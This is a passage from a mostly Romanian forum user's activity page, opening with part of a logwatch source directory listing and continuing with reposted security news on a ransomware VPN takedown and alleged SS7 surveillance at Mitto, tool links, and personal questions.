rsnapshot 01/22/2022 02:00 AM 6,549 rsyslogd 01/22/2022 02:00 AM 4,366 rt314 01/22/2022 02:00 AM 25,759 samba 01/22/2022 02:00 AM 3,665 saslauthd 01/22/2022 02:00 AM 2,864 scsi 01/22/2022 02:00 AM 43,100 secure 01/22/2022 02:00 AM 92,367 sendmail 01/22/2022 02:00 AM 2,747 sendmail-largeboxes 01/22/2022 02:00 AM 5,078 shaperd 01/22/2022 02:00 AM 4,521 slon 01/22/2022 02:00 AM 16,729 smartd 01/22/2022 02:00 AM 26,896 sonicwall 01/22/2022 02:00 AM 7,791 spamassassin 01/22/2022 02:00 AM 36,864 sshd 01/22/2022 02:00 AM 2,345 sshd2 01/22/2022 02:00 AM 6,389 sssd 01/22/2022 02:00 AM 6,411 stunnel 01/22/2022 02:00 AM 6,191 sudo 01/22/2022 02:00 AM 20,853 syslog-ng 01/22/2022 02:00 AM 2,312 syslogd 01/22/2022 02:00 AM 15,992 systemd 01/22/2022 02:00 AM 4,148 tac_acc 01/22/2022 02:00 AM 4,629 tivoli-smc 01/22/2022 02:00 AM 5,241 up2date 01/22/2022 02:00 AM 8,320 vdr 01/22/2022 02:00 AM 4,112 vpopmail 01/22/2022 02:00 AM 9,649 vsftpd 01/22/2022 02:00 AM 16,951 windows 01/22/2022 02:00 AM 9,784 xntpd 01/22/2022 02:00 AM 3,017 yum 01/22/2022 02:00 AM 2,866 zypp 01/22/2022 02:00 AM 6,573 zz-disk_space 01/22/2022 02:00 AM 2,482 zz-lm_sensors 01/22/2022 02:00 AM 7,181 zz-network 01/22/2022 02:00 AM 1,472 zz-runtime 01/22/2022 02:00 AM 2,912 zz-sys 01/22/2022 02:00 AM 6,122 zz-zfs 119 File(s) 1,778,778 bytes Directory of logwatch-7.6.tar\logwatch-7.6\logwatch-7.6\scripts\shared 01/22/2022 02:00 AM <DIR> . 01/22/2022 02:00 AM <DIR> .. 01/22/2022 02:00 AM 2,775 applybinddate 01/22/2022 02:00 AM 1,730 applyeurodate 01/22/2022 02:00 AM 1,522 applyhttpdate 01/22/2022 02:00 AM 2,225 applystddate 01/22/2022 02:00 AM 3,096 applytaidate 01/22/2022 02:00 AM 1,508 applyusdate 01/22/2022 02:00 AM 2,028 eventlogonlyservice 01/22/2022 02:00 AM 2,825 eventlogremoveservice 01/22/2022 02:00 AM 1,641 expandrepeats 01/22/2022 02:00 AM 1,557 hosthash 01/22/2022 02:00 AM 1,812 hostlist 01/22/2022 02:00 AM 3,297 journalctl 01/22/2022 02:00 AM 1,941 multiservice 01/22/2022 02:00 AM 1,198 onlycontains 01/22/2022 02:00 AM 2,062 onlyhost 01/22/2022 02:00 AM 1,683 onlyservice 01/22/2022 02:00 AM 1,221 remove 01/22/2022 02:00 AM 1,927 removeheaders 01/22/2022 02:00 AM 1,889 removeservice 19 File(s) 37,937 bytes Total Files Listed: 345 File(s) 2,279,866 bytes 53 Dir(s) 28,251,189,248 bytes free Download: logwatch-7.6.tar.gz (477.3 KB) Source
  13. Kev
    Se transmite prin saliva, inclusiv prin transpiratie {[(tricou, sutien, etc) stiu de la decani]}.
  14. Kev
    https://seyfmark.com/blog/7-free-seo-tools-to-spy-on-competitors-website-traffic/ Cat cotizezi pentru GSA Search Engine? P.S. tre mutat in categoria black seo si monetizare
  15. Kev
    law enforcement agencies in ten nations, including the FBI in the United States, shut down a 15-server VPN service used to anonymize ransomware attacks. (Photo: Europol) On Monday, law enforcement agencies in 10 nations, including the FBI in the United States, shut down a 15-server VPN service used to anonymize ransomware attacks. VPNLab[.]net allegedly provided cover for at least 150 ransomware attacks, according to Ukrainian law enforcement, netting approximately 60 million euros in ransom. The service was headquartered in Germany, where the Hannover police led the investigation. Europol described the service as "a popular choice for cybercriminals." The nations involved in the takedown included Germany, the Netherlands, Canada, the Czech Republic, France, Hungary, Latvia, Ukraine, the United States and the United Kingdom. Europol and Eurojust provided additional support, including hosting more than 60 coordination meetings. Ransomware is a complex economy, where several enterprises utilize several different suppliers, with the ability to shift from one to another. Experts note that law enforcement needs to target the high-profile ransomware brands, the lower profile affiliates, as well as the services they use (including VPNs). In September, the United States sanctioned a cryptocurrency exchange popular with ransomware actors. The VPNLab action follows Russian law enforcement arrested 14 members of the REvil ransomware gang last week, a major breakthrough in police targeting ransomware manufacturers. Via scmagazine.com
  16. Kev
    Isi revenise intre timp Nu Da Am frisoane, de la șpriț. Posibil sa se fi facut condens de la schimbarile bruste de temperatura. Thanks
  17. Kev
    Salut natiune, pe un sistem windows 10 imi afiseaza mesajul "Please wait" de 30 de minute. In casa a fost cald +36° C iar afara sub zero, am lasat fereastra deschisa cu el pornit, a clacat, i-am dat restart si tot astept, sursa este intre calorifer su geam. Stiu asta din instructiunile de la frigiser, nu trebuie pornit brusc de la o temperatura la alta. Ce poate fi? Multumesc si dau o cinste
  18. Kev

    Microsoft Reward

    Kev posted a topic in Free stuff

    Earn free gift cards and more with Microsoft Rewards You will receive emails about Microsoft Rewards, which include offers about Microsoft and partner products. Link: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&id=264960&wreply=https%3a%2f%2fwww.bing.com%2fsecure%2fPassport.aspx%3frequrl%3dhttps%253a%252f%252fwww.bing.com%252fmsrewards%252fapi%252fv1%252fenroll%253fpubl%253dBINGIP%2526crea%253dMY01Z9%2526pn%253dBINGTRIAL5TO250P201808%2526partnerId%253dAutoOpenFlyout%2526pred%253dtrue%2526sessionId%253d1862B437CF21630F019AA512CE596287%26sig%3d1862B437CF21630F019AA512CE596287&wp=MBI_SSL&lc=1033&CSRFToken=4a66dfb6-49de-4d39-8ae1-09e0932617b3&cobrandid=03c8bbb5-2dff-4721-8261-a4ccff24c81a&lw=1&fl=easi2
  19. Kev
    https://bkinfosys.beckhoff.com/english.php Pune-L in syntax highlight. https://www.online-toolz.com
  20. Kev
    Craciun fericit! Este adevarat faptul pentru care se poate circula ca pieton pe partea carosabila, in cartier rezidential? (Conform legislatiei in viguare). Thanks
  21. Kev

    encoding.tools

    Kev posted a topic in Programare

    Encoding.tools is a utility for performing a series of arbitrary transforms on binary data. This tool can be useful for security researchers or programmers who need to encode or decode strings with multiple steps, e.g. to decode an obfuscated string in a web application, you may need to perform multiple steps, e.g. URL decode, then base64 decode, etc. URL: encoding.tools Source: https://markhaa.se/posts/encoding-tools-gets-svelte/
  22. Kev
    Salut Stiu ca exista incarcatoare wireless: Sa presupunem ca plec cu prietena mea in camping si isi uita incarcatorul acasa, amandoi avand smartphones, eu full batterry, iar prietena mea 0%, exista o aplicatie prin care ii pot transfera power prin wireless? Multumesc
  23. Kev
    How it works Compile and Open p2p.exe as admin in 2 different PC's Copy the My Lan or Wan IP and communicate it to other peer. So the 2 peers have now the 2 enpoint to connect to, so press on both Connect. The 2 peers now are able to sent messages or take the Remote Desktop Control between them. It's use UDT protocol and thanks to rendezvous connection, it should be able to bypass all firewall rules etc, like a small concepts of TeamViewer at 0 cost! Contributing Contributions are welcome and greatly appreciated! License Download: p2p-main.zip or git clone https://github.com/miroslavpejic85/p2p.git Source
  24. Kev
    Salut, Am un proces pe parte vãtãmatã. Intrebarea este: cum pot intra (legal) in tribunal fãrã certificat verde? (sunt alergic la ace si tuburi prin nas si ce mai fac ei in spitale), de pistoale cu termo am trecut si la vot si pe unde am mai fost. In caz de neprezentare acuzatul castiga procesul. Multumesc anticipat
  25. Kev
    The company has reportedly contracted with the likes of Twitter, Google, WhatsApp, Telegram, TikTok, Instagram, LinkedIn, and Slack. One of the top executives of a gargantuan texting contractor has been accused of running a secret surveillance business, the likes of which sold access to the company’s partner networks so that governments could spy on various users. A joint investigation from Bloomberg and the Bureau of Investigative Journalism recently uncovered allegations aimed at Ilja Gorelik, co-founder and chief operating officer of Swiss texting firm Mitto AG. Calling itself a provider of “omnichannel messaging solutions,” Mitto acts as a third-party SMS contractor for some of the tech industry’s biggest companies. In that role, it essentially offers promotional services (i.e., helping blast out texted advertisements and other kinds of notifications to mobile phones all over the world), and also enables secure login and two-factor authentication for various platforms through security code texting. The company reportedly has relationships with dozens of telecoms and has contracted with the likes of Twitter, Google, WhatsApp, Telegram, TikTok, Instagram, LinkedIn, and Slack, among others. It reportedly delivers texts to billions of phones all over the world, including in places as far-flung as Afghanistan and Iran. However, according to new reporting, the company’s COO, Gorelik, has been running a secret side-business in which he sells access to Mitto’s networks to private surveillance companies, which then sell that access to government spy agencies—allowing them to triangulate and track specific users. Bloomberg spoke to four former Mitto employees, as well as to security firm contractors that claim to have worked with Gorelik, all of whom apparently confirmed the executive’s activity. The access to global phone networks that do business with Mitto is said to have been provided through vulnerabilities in a telecom protocol known as SS7. The insecurity of the protocol is fairly well-known. The exploitation of SS7 could allow an attacker to track the physical location of specific phones as well as to redirect text messages and phone calls, Bloomberg reports. Former employees of at least one company—the Cyprus-based security firm TRG Research and Development—went on record to admit that they procured access to Mitto’s networks through Gorelik. The former employees allege that Gorelik personally installed TRG surveillance software on Mitto’s network, enabling clandestine access. According to them, there was “virtually no oversight” of the alleged spying activity that went on. TRG, which sells data to government agencies for the purposes of fighting crime and “terror,” denied any official relationship with Mitto or Gorelik. This seems to have gone on for years. According to the whistleblowers, Gorelik first started selling access to Mitto’s networks in 2017. The spying is alleged to have included a 2019 incident that involved the targeting of at least one high-level U.S. State Department official. If true, these allegations are yet another example of the murky, unethical reaches of the surveillance industry—the likes of which is really having a moment in terms of media coverage this year. The Bloomberg report asserts that there is no evidence that any of Mitto’s tech clients (i.e., Google, Twitter, etc.) have been compromised. Gorelik, meanwhile, has denied the allegations, as has Mitto. A representative for Mitto apparently told Bloomberg that it is currently conducting an investigation “to determine if our technology and business has been compromised.” We reached out to the company with multiple requests for comment but haven’t heard back. We will update this story if they respond. Via gizmodo.com
×
×
  • Create New...